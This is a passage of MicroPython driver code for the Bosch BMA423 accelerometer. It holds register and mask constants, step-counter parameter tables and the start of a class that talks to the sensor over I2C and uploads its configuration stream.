const(0x7E)\n\n# GPIO REGISTERS\nBMA4_STEP_CNT_OUT_0_ADDR\t= const(0x1E)\nBMA4_HIGH_G_OUT_ADDR\t\t= const(0x1F)\nBMA4_ACTIVITY_OUT_ADDR\t\t= const(0x27)\nBMA4_ORIENTATION_OUT_ADDR\t= const(0x28)\nBMA4_INTERNAL_STAT\t\t\t= const(0x2A)\n\nBMA4_BLOCK_SIZE\t\t\t= const(32)\n\n# I2C slave address \nBMA4_I2C_ADDR_PRIMARY\t= const(0x18)\nBMA4_I2C_ADDR_SECONDARY\t= const(0x19)\nBMA4_I2C_BMM150_ADDR = const(0x10)\n\n# Interface selection macro \nBMA4_SPI_INTERFACE\t\t= const(1)\nBMA4_I2C_INTERFACE\t\t= const(2)\n\n# Interface selection macro \nBMA4_SPI_WR_MASK\t\t= const(0x7F)\nBMA4_SPI_RD_MASK\t\t= const(0x80)\n\n# Auxiliary sensor selection macro \nBMM150_SENSOR\t\t\t= const(1)\nAKM9916_SENSOR\t\t\t= const(2)\nBMA4_ASIC_INITIALIZED\t\t= const(0x01)\n\n# Auxiliary sensor chip id macros \nBMM150_CHIP_ID = const(0x32)\n\n# Auxiliary sensor other macros \nBMM150_POWER_CONTROL_REG = const(0x4B)\nBMM150_POWER_MODE_REG\t\t\t= const(0x4C)\n\n# \tCONSTANTS \nBMA4_FIFO_CONFIG_LENGTH\t\t= const(2)\nBMA4_ACCEL_CONFIG_LENGTH\t= const(2)\nBMA4_FIFO_WM_LENGTH\t\t\t= const(2)\nBMA4_CONFIG_STREAM_SIZE\t\t= const(6144)\nBMA4_NON_LATCH_MODE\t\t\t= const(0)\nBMA4_LATCH_MODE\t\t\t\t= const(1)\nBMA4_OPEN_DRAIN\t\t\t\t= const(1)\nBMA4_PUSH_PULL\t\t\t\t= const(0)\nBMA4_ACTIVE_HIGH\t\t\t= const(1)\nBMA4_ACTIVE_LOW\t\t\t\t= const(0)\nBMA4_EDGE_TRIGGER\t\t\t= const(1)\nBMA4_LEVEL_TRIGGER\t\t\t= const(0)\nBMA4_OUTPUT_ENABLE\t\t\t= const(1)\nBMA4_OUTPUT_DISABLE\t\t\t= const(0)\nBMA4_INPUT_ENABLE\t\t\t= const(1)\nBMA4_INPUT_DISABLE\t\t\t= const(0)\n\n# ACCEL RANGE CHECK\nBMA4_ACCEL_RANGE_2G\t\t= const(0)\nBMA4_ACCEL_RANGE_4G\t\t= const(1)\nBMA4_ACCEL_RANGE_8G\t\t= const(2)\nBMA4_ACCEL_RANGE_16G\t= const(3)\n\n# CONDITION CHECK FOR READING AND WRTING DATA\nBMA4_MAX_VALUE_FIFO_FILTER\t\t= const(1)\nBMA4_MAX_VALUE_SPI3\t\t\t\t= const(1)\nBMA4_MAX_VALUE_SELFTEST_AMP\t\t= const(1)\nBMA4_MAX_IF_MODE\t\t\t\t= const(3)\nBMA4_MAX_VALUE_SELFTEST_SIGN\t= const(1)\n\n# BUS READ AND WRITE LENGTH FOR MAG & ACCEL\nBMA4_MAG_TRIM_DATA_SIZE\t\t= const(16)\nBMA4_MAG_XYZ_DATA_LENGTH\t= const(6)\nBMA4_MAG_XYZR_DATA_LENGTH\t= const(8)\nBMA4_ACCEL_DATA_LENGTH\t\t= const(6)\nBMA4_FIFO_DATA_LENGTH\t\t= const(2)\nBMA4_TEMP_DATA_SIZE\t\t\t= const(1)\n\n# TEMPERATURE CONSTANT \nBMA4_OFFSET_TEMP\t\t= const(23)\nBMA4_DEG\t\t\t= const(1)\nBMA4_FAHREN\t\t\t= const(2)\nBMA4_KELVIN\t\t\t= const(3)\n\n# DELAY DEFINITION IN MSEC\nBMA4_AUX_IF_DELAY\t\t\t= const(5)\nBMA4_BMM150_WAKEUP_DELAY1\t= const(2)\nBMA4_BMM150_WAKEUP_DELAY2\t= const(3)\nBMA4_BMM150_WAKEUP_DELAY3\t= const(1)\nBMA4_GEN_READ_WRITE_DELAY\t= const(1)\nBMA4_AUX_COM_DELAY\t\t\t= const(10)\n\n# \tARRAY PARAMETER DEFINITIONS\nBMA4_SENSOR_TIME_MSB_BYTE\t= const(2)\nBMA4_SENSOR_TIME_XLSB_BYTE\t= const(1)\nBMA4_SENSOR_TIME_LSB_BYTE\t= const(0)\nBMA4_MAG_X_LSB_BYTE\t\t\t= const(0)\nBMA4_MAG_X_MSB_BYTE\t\t\t= const(1)\nBMA4_MAG_Y_LSB_BYTE\t\t\t= const(2)\nBMA4_MAG_Y_MSB_BYTE\t\t\t= const(3)\nBMA4_MAG_Z_LSB_BYTE\t\t\t= const(4)\nBMA4_MAG_Z_MSB_BYTE\t\t\t= const(5)\nBMA4_MAG_R_LSB_BYTE\t\t\t= const(6)\nBMA4_MAG_R_MSB_BYTE\t\t\t= const(7)\nBMA4_TEMP_BYTE\t\t\t\t= const(0)\nBMA4_FIFO_LENGTH_MSB_BYTE\t= const(1)\n\n# \tERROR CODES\t\nBMA4_OK\t\t\t\t= const(0)\nBMA4_E_NULL_PTR\t\t\t= const(1)\nBMA4_E_OUT_OF_RANGE\t\t= const(1 << 1)\nBMA4_E_INVALID_SENSOR\t\t= const(1 << 2)\nBMA4_E_CONFIG_STREAM_ERROR\t= const(1 << 3)\nBMA4_E_SELF_TEST_FAIL\t\t= const(1 << 4)\nBMA4_E_FOC_FAIL\t\t\t= const(1 << 5)\nBMA4_E_FAIL\t\t\t= const(1 << 6)\nBMA4_E_INT_LINE_INVALID\t\t= const(1 << 7)\nBMA4_E_RD_WR_LENGTH_INVALID\t= const(1 << 8)\nBMA4_E_AUX_CONFIG_FAIL\t\t= const(1 << 9)\nBMA4_E_SC_FIFO_HEADER_ERR\t= const(1 << 10)\nBMA4_E_SC_FIFO_CONFIG_ERR\t= const(1 << 11)\n\n# \tUTILITY MACROS\t\nBMA4_SET_LOW_BYTE\t\t\t= const(0x00FF)\nBMA4_SET_HIGH_BYTE\t\t\t= const(0xFF00)\nBMA4_SET_LOW_NIBBLE\t\t\t= const(0x0F)\n\n# \tFOC RELATED MACROS\t\nBMA4_ACCEL_CONFIG_FOC\t\t= const(0xB7)\n\n\nBMA42X_ST_ACC_X_AXIS_SIGNAL_DIFF\t= const(400)\nBMA42X_ST_ACC_Y_AXIS_SIGNAL_DIFF\t= const(800)\nBMA42X_ST_ACC_Z_AXIS_SIGNAL_DIFF\t= const(400)\n\n# Self-test: Resulting minimum difference signal in mg for BMA45x \nBMA45X_ST_ACC_X_AXIS_SIGNAL_DIFF\t= const(1800)\nBMA45X_ST_ACC_Y_AXIS_SIGNAL_DIFF\t= const(1800)\nBMA45X_ST_ACC_Z_AXIS_SIGNAL_DIFF\t= const(1800)\n\n# \tERROR STATUS POSITION AND MASK\nBMA4_FATAL_ERR_MSK\t\t= const(0x01)\nBMA4_CMD_ERR_POS\t\t= const(1)\nBMA4_CMD_ERR_MSK\t\t= const(0x02)\nBMA4_ERR_CODE_POS\t\t= const(2)\nBMA4_ERR_CODE_MSK\t\t= const(0x1C)\nBMA4_FIFO_ERR_POS\t\t= const(6)\nBMA4_FIFO_ERR_MSK\t\t= const(0x40)\nBMA4_AUX_ERR_POS\t\t= const(7)\nBMA4_AUX_ERR_MSK\t\t= const(0x80)\n\n# \tMaximum number of bytes to be read from the sensor \nBMA4_MAX_BUFFER_SIZE = const(81)\n\n# \tNV_CONFIG POSITION AND MASK\n# NV_CONF Description - Reg Addr --> (0x70), Bit --> 3 \nBMA4_NV_ACCEL_OFFSET_POS\t= const(3)\nBMA4_NV_ACCEL_OFFSET_MSK\t= const(0x08)\n\n# \tMAG DATA XYZ POSITION AND MASK\nBMA4_DATA_MAG_X_LSB_POS\t\t= const(3)\nBMA4_DATA_MAG_X_LSB_MSK\t\t= const(0xF8)\nBMA4_DATA_MAG_Y_LSB_POS\t\t= const(3)\nBMA4_DATA_MAG_Y_LSB_MSK\t\t= const(0xF8)\nBMA4_DATA_MAG_Z_LSB_POS\t\t= const(1)\nBMA4_DATA_MAG_Z_LSB_MSK\t\t= const(0xFE)\nBMA4_DATA_MAG_R_LSB_POS\t\t= const(2)\nBMA4_DATA_MAG_R_LSB_MSK\t\t= const(0xFC)\n\n# ACCEL DATA READY POSITION AND MASK\nBMA4_STAT_DATA_RDY_ACCEL_POS\t= const(7)\nBMA4_STAT_DATA_RDY_ACCEL_MSK\t= const(0x80)\n\n# MAG DATA READY POSITION AND MASK\nBMA4_STAT_DATA_RDY_MAG_POS\t= const(5)\nBMA4_STAT_DATA_RDY_MAG_MSK\t= const(0x20)\n\n# ADVANCE POWER SAVE POSITION AND MASK\nBMA4_ADVANCE_POWER_SAVE_MSK\t= const(0x01)\n\n# ACCELEROMETER ENABLE POSITION AND MASK\nBMA4_ACCEL_ENABLE_POS\t\t= const(2)\nBMA4_ACCEL_ENABLE_MSK\t\t= const(0x04)\n\n# MAGNETOMETER ENABLE POSITION AND MASK\nBMA4_MAG_ENABLE_MSK\t\t= const(0x01)\n\n# \tACCEL CONFIGURATION POSITION AND MASK\nBMA4_ACCEL_ODR_MSK\t\t\t= const(0x0F)\nBMA4_ACCEL_BW_POS\t\t\t= const(4)\nBMA4_ACCEL_BW_MSK\t\t\t= const(0x70)\nBMA4_ACCEL_RANGE_MSK\t\t\t= const(0x03)\nBMA4_ACCEL_PERFMODE_POS\t\t\t= const(7)\nBMA4_ACCEL_PERFMODE_MSK\t\t\t= const(0x80)\n\n# \tMAG CONFIGURATION POSITION AND MASK\nBMA4_MAG_CONFIG_OFFSET_POS\t\t= const(4)\nBMA4_MAG_CONFIG_OFFSET_LEN\t\t= const(4)\nBMA4_MAG_CONFIG_OFFSET_MSK\t\t= const(0xF0)\nBMA4_MAG_CONFIG_OFFSET_REG\t\t= BMA4_AUX_CONFIG_ADDR\n\n# FIFO SELF WAKE UP POSITION AND MASK\nBMA4_FIFO_SELF_WAKE_UP_POS\t= const(1)\nBMA4_FIFO_SELF_WAKE_UP_MSK\t= const(0x02)\n\n# \tFIFO BYTE COUNTER POSITION AND MASK\nBMA4_FIFO_BYTE_COUNTER_MSB_MSK\t= const(0x3F)\n\n# \tFIFO DATA POSITION AND MASK\nBMA4_FIFO_DATA_POS\t\t= const(0)\nBMA4_FIFO_DATA_MSK\t\t= const(0xFF)\n\n# \tFIFO FILTER FOR ACCEL POSITION AND MASK\nBMA4_FIFO_DOWN_ACCEL_POS\t\t= const(4)\nBMA4_FIFO_DOWN_ACCEL_MSK\t\t= const(0x70)\nBMA4_FIFO_FILTER_ACCEL_POS\t\t= const(7)\nBMA4_FIFO_FILTER_ACCEL_MSK\t\t= const(0x80)\n\n# \tFIFO HEADER DATA DEFINITIONS \nFIFO_HEAD_A\t\t\t\t\t= const(0x84)\nFIFO_HEAD_M\t\t\t\t\t= const(0x90)\nFIFO_HEAD_M_A\t\t\t\t= const(0x94)\nFIFO_HEAD_SENSOR_TIME\t\t= const(0x44)\nFIFO_HEAD_INPUT_CONFIG\t\t= const(0x48)\nFIFO_HEAD_SKIP_FRAME\t\t= const(0x40)\nFIFO_HEAD_OVER_READ_MSB\t\t= const(0x80)\nFIFO_HEAD_SAMPLE_DROP\t\t= const(0x50)\n\n# \tFIFO HEADERLESS MODE DATA ENABLE DEFINITIONS \nBMA4_FIFO_M_A_ENABLE\t\t= const(0x60)\nBMA4_FIFO_A_ENABLE\t\t\t= const(0x40)\nBMA4_FIFO_M_ENABLE\t\t\t= const(0x20)\n\n# \tFIFO CONFIGURATION SELECTION \nBMA4_FIFO_STOP_ON_FULL\t\t= const(0x01)\nBMA4_FIFO_TIME\t\t\t\t= const(0x02)\nBMA4_FIFO_TAG_INTR2\t\t\t= const(0x04)\nBMA4_FIFO_TAG_INTR1\t\t\t= const(0x08)\nBMA4_FIFO_HEADER\t\t\t= const(0x10)\nBMA4_FIFO_MAG\t\t\t\t= const(0x20)\nBMA4_FIFO_ACCEL\t\t\t\t= const(0x40)\nBMA4_FIFO_ALL\t\t\t\t= const(0x7F)\nBMA4_FIFO_CONFIG_0_MASK\t\t= const(0x03)\nBMA4_FIFO_CONFIG_1_MASK\t\t= const(0xFC)\n\n# \tFIFO FRAME COUNT DEFINITION \nFIFO_LSB_CONFIG_CHECK\t\t= const(0x00)\nFIFO_MSB_CONFIG_CHECK\t\t= const(0x80)\nBMA4_FIFO_TAG_INTR_MASK\t\t= const(0xFC)\n\n# \tFIFO DROPPED FRAME DEFINITION \nAUX_FIFO_DROP\t\t\t\t= const(0x04)\nACCEL_AUX_FIFO_DROP\t\t\t= const(0x05)\nACCEL_FIFO_DROP\t\t\t\t= const(0x01)\n\n# FIFO MAG DEFINITION\nBMA4_MA_FIFO_A_X_LSB\t= const(8)\n\n# FIFO sensor time length definitions\nBMA4_SENSOR_TIME_LENGTH\t\t= const(3)\n\n# FIFO LENGTH DEFINITION\nBMA4_FIFO_A_LENGTH\t\t\t= const(6)\nBMA4_FIFO_M_LENGTH\t\t\t= const(8)\nBMA4_FIFO_MA_LENGTH\t\t\t= const(14)\n\n# \tMAG I2C ADDRESS SELECTION POSITION AND MASK\nBMA4_I2C_DEVICE_ADDR_POS\t\t= const(1)\nBMA4_I2C_DEVICE_ADDR_MSK\t\t= const(0xFE)\n\n# MAG CONFIGURATION FOR SECONDARY INTERFACE POSITION AND MASK\nBMA4_MAG_BURST_MSK\t\t\t= const(0x03)\nBMA4_MAG_MANUAL_ENABLE_POS\t\t= const(7)\nBMA4_MAG_MANUAL_ENABLE_MSK\t\t= const(0x80)\nBMA4_READ_ADDR_MSK\t\t\t= const(0xFF)\nBMA4_WRITE_ADDR_MSK\t\t\t= const(0xFF)\nBMA4_WRITE_DATA_MSK\t\t\t= const(0xFF)\n\n# \tOUTPUT TYPE ENABLE POSITION AND MASK\nBMA4_INT_EDGE_CTRL_MASK\t\t\t= const(0x01)\nBMA4_INT_EDGE_CTRL_POS\t\t\t= const(0x00)\nBMA4_INT_LEVEL_MASK\t\t\t\t= const(0x02)\nBMA4_INT_LEVEL_POS\t\t\t\t= const(0x01)\nBMA4_INT_OPEN_DRAIN_MASK\t\t= const(0x04)\nBMA4_INT_OPEN_DRAIN_POS\t\t\t= const(0x02)\nBMA4_INT_OUTPUT_EN_MASK\t\t\t= const(0x08)\nBMA4_INT_OUTPUT_EN_POS\t\t\t= const(0x03)\nBMA4_INT_INPUT_EN_MASK\t\t\t= const(0x10)\nBMA4_INT_INPUT_EN_POS\t\t\t= const(0x04)\n\n# \tIF CONFIG POSITION AND MASK\nBMA4_CONFIG_SPI3_MSK\t\t\t= const(0x01)\nBMA4_IF_CONFIG_IF_MODE_POS\t\t= const(4)\nBMA4_IF_CONFIG_IF_MODE_MSK\t\t= const(0x10)\n\n# \tACCEL SELF TEST POSITION AND MASK\nBMA4_ACCEL_SELFTEST_ENABLE_MSK\t= const(0x01)\nBMA4_ACCEL_SELFTEST_SIGN_POS\t= const(2)\nBMA4_ACCEL_SELFTEST_SIGN_MSK\t= const(0x04)\nBMA4_SELFTEST_AMP_POS\t\t\t= const(3)\nBMA4_SELFTEST_AMP_MSK\t\t\t= const(0x08)\n\n# \tACCEL ODR \nBMA4_OUTPUT_DATA_RATE_0_78HZ\t= const(0x01)\nBMA4_OUTPUT_DATA_RATE_1_56HZ\t= const(0x02)\nBMA4_OUTPUT_DATA_RATE_3_12HZ\t= const(0x03)\nBMA4_OUTPUT_DATA_RATE_6_25HZ\t= const(0x04)\nBMA4_OUTPUT_DATA_RATE_12_5HZ\t= const(0x05)\nBMA4_OUTPUT_DATA_RATE_25HZ\t\t= const(0x06)\nBMA4_OUTPUT_DATA_RATE_50HZ\t\t= const(0x07)\nBMA4_OUTPUT_DATA_RATE_100HZ\t\t= const(0x08)\nBMA4_OUTPUT_DATA_RATE_200HZ\t\t= const(0x09)\nBMA4_OUTPUT_DATA_RATE_400HZ\t\t= const(0x0A)\nBMA4_OUTPUT_DATA_RATE_800HZ\t\t= const(0x0B)\nBMA4_OUTPUT_DATA_RATE_1600HZ\t= const(0x0C)\n\n# \tACCEL BANDWIDTH PARAMETER \nBMA4_ACCEL_OSR4_AVG1\t\t= const(0)\nBMA4_ACCEL_OSR2_AVG2\t\t= const(1)\nBMA4_ACCEL_NORMAL_AVG4\t = const(2)\nBMA4_ACCEL_CIC_AVG8\t\t\t= const(3)\nBMA4_ACCEL_RES_AVG16\t\t= const(4)\nBMA4_ACCEL_RES_AVG32\t\t= const(5)\nBMA4_ACCEL_RES_AVG64\t\t= const(6)\nBMA4_ACCEL_RES_AVG128\t\t= const(7)\n\n# \tACCEL PERFMODE PARAMETER \nBMA4_CIC_AVG_MODE\t\t\t= const(0)\nBMA4_CONTINUOUS_MODE\t\t= const(1)\n\n# \tMAG OFFSET \nBMA4_MAG_OFFSET_MAX\t\t= const(0x00)\n\n# \tENABLE/DISABLE SELECTIONS \nBMA4_X_AXIS\t\t= const(0)\nBMA4_Y_AXIS\t\t= const(1)\nBMA4_Z_AXIS\t\t= const(2)\n\n# SELF TEST\nBMA4_SELFTEST_PASS\t\t\t\t= const(0)\nBMA4_SELFTEST_FAIL\t\t\t\t= const(1)\n\n# INTERRUPT MAPS \nBMA4_INTR1_MAP\t\t= const(0)\nBMA4_INTR2_MAP\t\t= const(1)\n\n# \tINTERRUPT MASKS \nBMA4_FIFO_FULL_INT\t\t\t= const(0x0100)\nBMA4_FIFO_WM_INT\t\t\t= const(0x0200)\nBMA4_DATA_RDY_INT\t\t\t= const(0x0400)\nBMA4_MAG_DATA_RDY_INT\t\t= const(0x2000)\nBMA4_ACCEL_DATA_RDY_INT\t\t= const(0x8000)\n\n\n# \tAKM POWER MODE SELECTION \nAKM_POWER_DOWN_MODE\t\t\t= const(0)\nAKM_SINGLE_MEAS_MODE\t\t= const(1)\n\n# \tSECONDARY_MAG POWER MODE SELECTION \nBMA4_MAG_FORCE_MODE\t\t\t= const(0)\nBMA4_MAG_SUSPEND_MODE\t\t= const(1)\n\n# \tMAG POWER MODE SELECTION \nFORCE_MODE\t\t\t= const(0)\nSUSPEND_MODE\t\t= const(1)\n\n# \tACCEL POWER MODE \nACCEL_MODE_NORMAL\t= const(0x11)\n\n# \tMAG POWER MODE \nMAG_MODE_SUSPEND\t\t= const(0x18)\n\n# \tENABLE/DISABLE BIT VALUES \nBMA4_ENABLE\t\t\t= const(0x01)\nBMA4_DISABLE\t\t= const(0x00)\n\n# \tDEFINITION USED FOR DIFFERENT WRITE \nBMA4_MANUAL_DISABLE\t\t\t= const(0x00)\nBMA4_MANUAL_ENABLE\t\t\t= const(0x01)\nBMA4_ENABLE_MAG_IF_MODE\t\t= const(0x01)\nBMA4_MAG_DATA_READ_REG\t\t= const(0x0A)\nBMA4_BMM_POWER_MODE_REG\t\t= const(0x06)\nBMA4_SEC_IF_NULL\t\t\t= const(0)\nBMA4_SEC_IF_BMM150\t\t\t= const(1)\nBMA4_SEC_IF_AKM09916\t\t= const(2)\nBMA4_ENABLE_AUX_IF_MODE\t\t= const(0x01)\n\n# \tSENSOR RESOLUTION \nBMA4_12_BIT_RESOLUTION\t\t= const(12)\nBMA4_14_BIT_RESOLUTION\t\t= const(14)\nBMA4_16_BIT_RESOLUTION = const(16)\n\n# MULTIPLIER \n# for handling micro-g values \nBMA4XY_MULTIPLIER = const(1000000)\n# for handling float temperature values \nBMA4_SCALE_TEMP = const(1000)\n# BMA4_FAHREN_SCALED = 1.8 * 1000 \nBMA4_FAHREN_SCALED\t = const(1800)\n# BMA4_KELVIN_SCALED = 273.15 * 1000 \nBMA4_KELVIN_SCALED\t = const(273150)\n\n\n########################################### defines specific to BMA423\n\n# Chip ID of BMA423 sensor \nBMA423_CHIP_ID\t\t\t\t= const(0x13)\n\n# Sensor feature size \nBMA423_FEATURE_SIZE\t\t\t= const(64)\nBMA423_ANYMOTION_EN_LEN\t\t\t= const(2)\nBMA423_RD_WR_MIN_LEN\t\t\t= const(2)\n\n# Feature offset address \nBMA423_ANY_NO_MOTION_OFFSET\t\t= const(0x00)\nBMA423_STEP_CNTR_OFFSET\t\t\t= const(0x36)\nBMA423_STEP_CNTR_PARAM_OFFSET\t\t= const(0x04)\nBMA423_WAKEUP_OFFSET\t\t\t= const(0x38)\nBMA423_TILT_OFFSET\t\t\t= const(0x3A)\nBMA423_CONFIG_ID_OFFSET\t\t\t= const(0x3C)\nBMA423_AXES_REMAP_OFFSET\t\t= const(0x3E)\n\n\n\n\n#************************************************************\n#\tRemap Axes \n#*************************************************************\nBMA423_X_AXIS_MASK\t\t\t= const(0x03)\nBMA423_X_AXIS_SIGN_MASK\t\t\t= const(0x04)\nBMA423_Y_AXIS_MASK\t\t\t= const(0x18)\nBMA423_Y_AXIS_SIGN_MASK\t\t\t= const(0x20)\nBMA423_Z_AXIS_MASK\t\t\t= const(0xC0)\nBMA423_Z_AXIS_SIGN_MASK\t\t\t= const(0x01)\n\n#*************************************************************\n#\tStep Counter & Detector \n#*************************************************************\n# Step counter enable macros \n#\nBMA423_STEP_CNTR_EN_POS\t\t\t= const(4)\nBMA423_STEP_CNTR_EN_MSK\t\t\t= const(0x10)\nBMA423_ACTIVITY_EN_MSK\t\t\t= const(0x20)\n\n# Step counter watermark macros \nBMA423_STEP_CNTR_WM_MSK\t\t\t= const(0x03FF)\n\n# Step counter reset macros \nBMA423_STEP_CNTR_RST_POS\t\t= const(2)\nBMA423_STEP_CNTR_RST_MSK\t\t= const(0x04)\n\n# Step detector enable macros \nBMA423_STEP_DETECTOR_EN_POS\t\t= const(3)\nBMA423_STEP_DETECTOR_EN_MSK\t\t= const(0x08)\n\n# Tilt enable macros \nBMA423_TILT_EN_MSK\t\t\t= const(0x01)\n\n# Step count output length\nBMA423_STEP_CNTR_DATA_SIZE\t\t= const(4)\n\n# Wakeup enable macros \nBMA423_WAKEUP_EN_MSK\t\t\t= const(0x01)\n\n# Wake up sensitivity macros \nBMA423_WAKEUP_SENS_POS\t\t\t= const(1)\nBMA423_WAKEUP_SENS_MSK\t\t\t= const(0x0E)\n\n# Tap selection macro \nBMA423_TAP_SEL_POS\t\t\t= const(4)\nBMA423_TAP_SEL_MSK\t\t\t= const(0x10)\n\n#*************************************************************\n#\tAny Motion \n#*************************************************************\n# Any motion threshold macros \nBMA423_ANY_NO_MOTION_THRES_POS\t\t= const(0)\nBMA423_ANY_NO_MOTION_THRES_MSK\t\t= const(0x07FF)\n\n# Any motion selection macros \nBMA423_ANY_NO_MOTION_SEL_POS\t\t= const(3)\nBMA423_ANY_NO_MOTION_SEL_MSK\t\t= const(0x08)\n\n# Any motion enable macros \nBMA423_ANY_NO_MOTION_AXIS_EN_POS\t= const(5)\nBMA423_ANY_NO_MOTION_AXIS_EN_MSK\t= const(0xE0)\n\n# Any motion duration macros \nBMA423_ANY_NO_MOTION_DUR_MSK\t\t= const(0x1FFF)\n\n#*************************************************************\n#\tUser macros \n#*************************************************************\n\n# Anymotion/Nomotion axis enable macros \nBMA423_X_AXIS_EN\t\t\t= const(0x01)\nBMA423_Y_AXIS_EN\t\t\t= const(0x02)\nBMA423_Z_AXIS_EN\t\t\t= const(0x04)\nBMA423_ALL_AXIS_EN\t\t\t= const(0x07)\nBMA423_ALL_AXIS_DIS\t\t\t= const(0x00)\n\n# Feature enable macros for the sensor \nBMA423_STEP_CNTR\t\t\t= const(0x01)\n# Below macros are mutually exclusive \nBMA423_ANY_MOTION\t\t\t= const(0x02)\nBMA423_NO_MOTION\t\t\t= const(0x04)\nBMA423_ACTIVITY\t\t\t\t= const(0x08)\nBMA423_TILT\t\t\t\t\t= const(0x10)\nBMA423_WAKEUP\t\t\t\t= const(0x20)\n\n# Interrupt status macros \nBMA423_STEP_CNTR_INT\t\t\t= const(0x02)\nBMA423_ACTIVITY_INT\t\t\t= const(0x04)\nBMA423_TILT_INT\t\t\t\t= const(0x08)\nBMA423_WAKEUP_INT\t\t\t= const(0x20)\nBMA423_ANY_NO_MOTION_INT\t\t= const(0x40)\nBMA423_ERROR_INT\t\t\t= const(0x80)\n\n# Activity recognition macros \nBMA423_USER_STATIONARY\t\t\t= const(0x00)\nBMA423_USER_WALKING\t\t\t= const(0x01)\nBMA423_USER_RUNNING\t\t\t= const(0x02)\nBMA423_STATE_INVALID\t\t\t= const(0x03)\n\n# Configuration selection macros \nBMA423_PHONE_CONFIG\t\t\t= const(0x00)\nBMA423_WRIST_CONFIG\t\t\t= const(0x01)\n\nfeature_data={ \n 'step_cntr': (BMA423_STEP_CNTR_OFFSET+1 , BMA423_STEP_CNTR_EN_MSK),\n 'activity': (BMA423_STEP_CNTR_OFFSET+1 , BMA423_ACTIVITY_EN_MSK),\n 'tilt': (BMA423_TILT_OFFSET, BMA423_TILT_EN_MSK),\n 'wakeup': (BMA423_WAKEUP_OFFSET, BMA423_WAKEUP_EN_MSK),\n 'no_motion': (1, BMA423_ANY_NO_MOTION_SEL_MSK), \n 'any_motion': (1, BMA423_ANY_NO_MOTION_SEL_MSK)\n } \n\n\nBMA423_PHONE_SC_PARAM = [ 0x132 , 0x78E6 , 0x84 , 0x6C9C , 0x07 , 0x7564 , 0x7EAA , 0x55F , 0xABE , 0x55F , 0xE896 ,\n 0x41EF , 0x01 , 0x0C , 0x0C , 0x4A , 0xA0 , 0x00 , 0x0C , 0x3CF0 , 0x100 , 0x00 , 0x00 , 0x00 , 0x00 ]\n\n\n# Step counter parameter setting(1-25) for wrist (Default) \nBMA423_WRIST_SC_PARAM = [ 0x12D ,0x7BD4 ,0x13B ,0x7ADB ,0x04 ,0x7B3F ,0x6CCD ,0x4C3 ,0x985 \n , 0x4C3 ,0xE6EC ,0x460C ,0x01 ,0x27 ,0x19 ,0x96 ,0xA0 ,0x01 ,0x0C ,0x3CF0 \n , 0x100 ,0x01 ,0x03 ,0x01 ,0x0E ] \n \n# BMA423_RW_LEN = const(32) \nBMA423_RW_LEN = const(8) \n\nclass BMA4Error(Exception):\n pass\n\nclass BMA4:\n def __init__(self, i2c, address=BMA4_I2C_ADDR_SECONDARY):\n self.address=address\n self.bus=i2c\n self.buffer = bytearray(100)\n self.mv = memoryview(self.buffer)\n self.bytebuf = self.mv[82:83]\n self.wordbuf = self.mv[82:84]\n self.confbuf = self.mv[0:BMA423_RW_LEN]\n self.chip_id= self.read_byte(BMA4_CHIP_ID_ADDR)\n # self.write_byte(BMA4_CMD_ADDR, 0xb6 )\n time.sleep_ms(20)\n \n\n def write_byte(self, reg, val):\n self.bytebuf[0] = val\n #print(\"write byte %02x %02x\" % (reg,val) )\n self.bus.writeto_mem(self.address, reg, self.bytebuf)\n\n def read_byte(self, reg):\n self.bus.readfrom_mem_into(self.address, reg, self.bytebuf)\n #print(\"read byte %02x %02x\" % (reg,self.bytebuf[0]) )\n return self.bytebuf[0]\n \n def write_data(self, reg, data):\n #print(\"write data %02x len=%d \" % (reg,len(data)),end=\" \")\n #for k in data:\n # print(hex(k),end=\" \")\n #print(\".\") \n self.bus.writeto_mem(self.address, reg, data)\n\n def read_data(self, reg, len):\n self.bus.readfrom_mem_into(self.address, reg, self.mv[0:len])\n return self.mv[0:len]\n\n def stream_transfer_write(self,data):\n asic_msb= 0xff & ( self.streamindex // 32 )\n asic_lsb= 0x0f & ( self.streamindex // 2 ) \n self.write_byte(BMA4_RESERVED_REG_5B_ADDR,asic_lsb)\n self.write_byte(BMA4_RESERVED_REG_5C_ADDR,asic_msb)\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n self.streamindex += len(data)\n \n def readbit(self,addr,mask,pos):\n return (self.read_byte(addr) & mask ) >> pos \n\n def writebit(self,addr,mask,pos,value):\n tmp=self.read_byte(addr)\n if value != 0:\n tmp |= mask\n else:\n tmp &= ~mask\n self.write_byte(addr,tmp)\n \n @property\n def accel_enable(self):\n return self.readbit(BMA4_POWER_CTRL_ADDR,BMA4_ACCEL_ENABLE_MSK,BMA4_ACCEL_ENABLE_POS) \n \n @accel_enable.setter\n def accel_enable(self,value):\n self.writebit(BMA4_POWER_CTRL_ADDR,BMA4_ACCEL_ENABLE_MSK,BMA4_ACCEL_ENABLE_POS,value)\n \n @property\n def advance_power_save(self):\n return self.read_byte(BMA4_POWER_CONF_ADDR) & BMA4_ADVANCE_POWER_SAVE_MSK\n \n @advance_power_save.setter\n def advance_power_save(self,value):\n pwr=self.read_byte(BMA4_POWER_CONF_ADDR)\n #print(\"apm is \",pwr,\"setting to\",value) \n if value != 0:\n pwr |= BMA4_ADVANCE_POWER_SAVE_MSK\n else:\n pwr &= ~BMA4_ADVANCE_POWER_SAVE_MSK \n self.write_byte(BMA4_POWER_CONF_ADDR,pwr)\n #print(\"apm writing \",pwr) \n time.sleep_ms(1)\n\n def get_feature_config_start_addr(self):\n self.asic_lsb=self.read_byte(BMA4_RESERVED_REG_5B_ADDR) & 0xf\n self.asic_msb=self.read_byte(BMA4_RESERVED_REG_5C_ADDR)\n \n \n def write_config_file(self,fn):\n self.advance_power_save=0\n asic=self.read_byte(BMA4_INTERNAL_STAT)\n #print(\"asic status=\",asic)\n \n self.write_byte(BMA4_INIT_CTRL_ADDR, 0x0);\n \n self.streamindex=0x0000\n with open(fn,\"rb\") as f:\n nread=f.readinto(self.confbuf)\n while nread > 0:\n self.stream_transfer_write(self.mv[0:nread])\n nread=f.readinto(self.confbuf)\n time.sleep_ms(10)\n self.write_byte(BMA4_INIT_CTRL_ADDR, 0x01);\n #for i in range(0,5):\n # time.sleep_ms(50)\n # asic=self.read_byte(BMA4_INTERNAL_STAT)\n # print(\"asic status=\",asic)\n time.sleep_ms(160)\n asic=self.read_byte(BMA4_INTERNAL_STAT)\n if asic != BMA4_ASIC_INITIALIZED:\n raise BMA4Error(\"could not initialize asic %02x\" % asic )\n self.advance_power_save=1\n self.get_feature_config_start_addr()\n print(\"* BMA423 ASIC initialized\")\n\n def read_accel(self):\n 